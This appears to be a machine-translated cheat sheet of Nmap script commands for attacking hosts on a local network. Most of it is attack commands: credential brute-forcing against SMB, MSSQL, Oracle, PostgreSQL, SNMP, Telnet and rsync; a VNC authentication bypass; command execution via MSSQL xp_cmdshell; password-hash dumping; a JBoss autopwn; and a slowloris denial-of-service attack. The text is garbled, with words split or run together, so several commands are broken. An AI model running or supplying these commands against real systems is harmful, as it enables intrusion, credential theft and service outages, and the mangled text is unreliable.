(1)Nmap--script=auth 192.168.137.* is responsible for the processing of the warrant book (bypass authentication) script, but also as a detection part of the application of weak password (2) Nmap--script=brute 192.168.137.* provides a way to provide brute forceDatabase, SMB,SNMP and other simple password brute force guess (3) nmap--script=default 192.168.137.* or NMAP-SC 192.168.137.* default script scanning, mainly collects information of various application services, collected, Can be attacked for specific services (4) Nmap--script=vuln 192.168.137.* Check for Common Vulnerabilities (5) Nmap-n-p445--script=broadcast 192.168.137.4 probing more in LAN Multi-Service Open conditionCheck VNC bypass Nmap --script=realvnc-auth-bypass 192.168.137.4 (1) Check VNC authentication method Nmap --script=vnc-auth 192.168.137.4 won Take VNC information Nmap --script=vnc-info 192.168.137.4 (2) SMB scan: SMB hack nmap --script=smb-brute.nse 192.168.137. 4 SMB dictionary hack nmap--script=smb-brute.nse--script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4 SMB known several serious leaky nm AP --script=smb-check-vulns.nse--script-args=unsafe=1 192.168.137.4 View shared directory nmap-p 445 --script smb-ls--SC Ript-args ' Share=e$,path=\,smbuser=test,smbpass=test ' 192.168.137.4 view session nmap-n-p445--script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4 System Information nmap-n-p445--script=smb-os-discovery.nse--script-args= Smbuser=test,smbpass=test 192.168.137.4 (3) MSSQL Scan: Guess the MSSQL username and password nmap-p1433--script=ms-sql-brute--script-args= USERDB=/VAR/PASSWD,PASSDB=/VAR/PASSWD 192.168.137.4 xp_cmdshell Execute command nmap-p 1433--script Ms-sql-xp-cmdshell--script- Args Mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd= "NET User" 192.168.137.4 (4) Dumphash value nmap-p 1433--script ms-sql-dump-hashes.nse--script -args mssql.username=sa,mssql.password=sa 192.168.137.4 Scan root empty password nmap-p3306--script= Mysql-empty-password.nse 192.168.137.4 List all MySQL users nmap-p3306--script=mysql-users.nse--script-args=mysqluser=root 192.168.137.4 (5)oracle Scan: Oracle SID scan Nmap--script=oracle-sid-brute-p 1521-1560 192.168.137.5 oracle weak password hack nmap--script oracle-brute-p 1 521--script-args oracle-brute.sid=orcl,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5 (6) Some of the more useful scripts nmap-- Script=broadcast-netbios-master-browser 192.168.137.4 Discovery Gateway nmap-p 873--script rsync-brute--script-args ' rsync- Brute.module=www ' 192.168.137.4 hack rsync nmap--script informix-brute-p 9088 192.168.137.4 informix data Library hack nmap-p 5432--script pgsql-brute 192.168.137.4 pgsql hack nmap-su--script snmp-brute 192.168.13 7.4 &NBSP;SNMP hack nmap-sv--script=telnet-brute 192.168.137.4 &NB Sp telnet hack nmap--script=http-vuln-cve2010-0738--script-args ' http-vuln-cve2010-0738.paths={/path1/,/path2/} ' <target> jboss autopwn nmap--script=http-methods.nse 192.168.137.4 Check http method nmap--script Http-slowloris-- Max-parallelism 400 192.168.137.4 dos attack, for less processing capacity of the site is very useful ' half-http ' connections nmap--script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4 nmap--script=smb-brute--script-args=userdb=/tmp/account dictionary. txt,passdb=/tmp/Password dictionary. txt IP address-p 445
Nmap Advanced Scan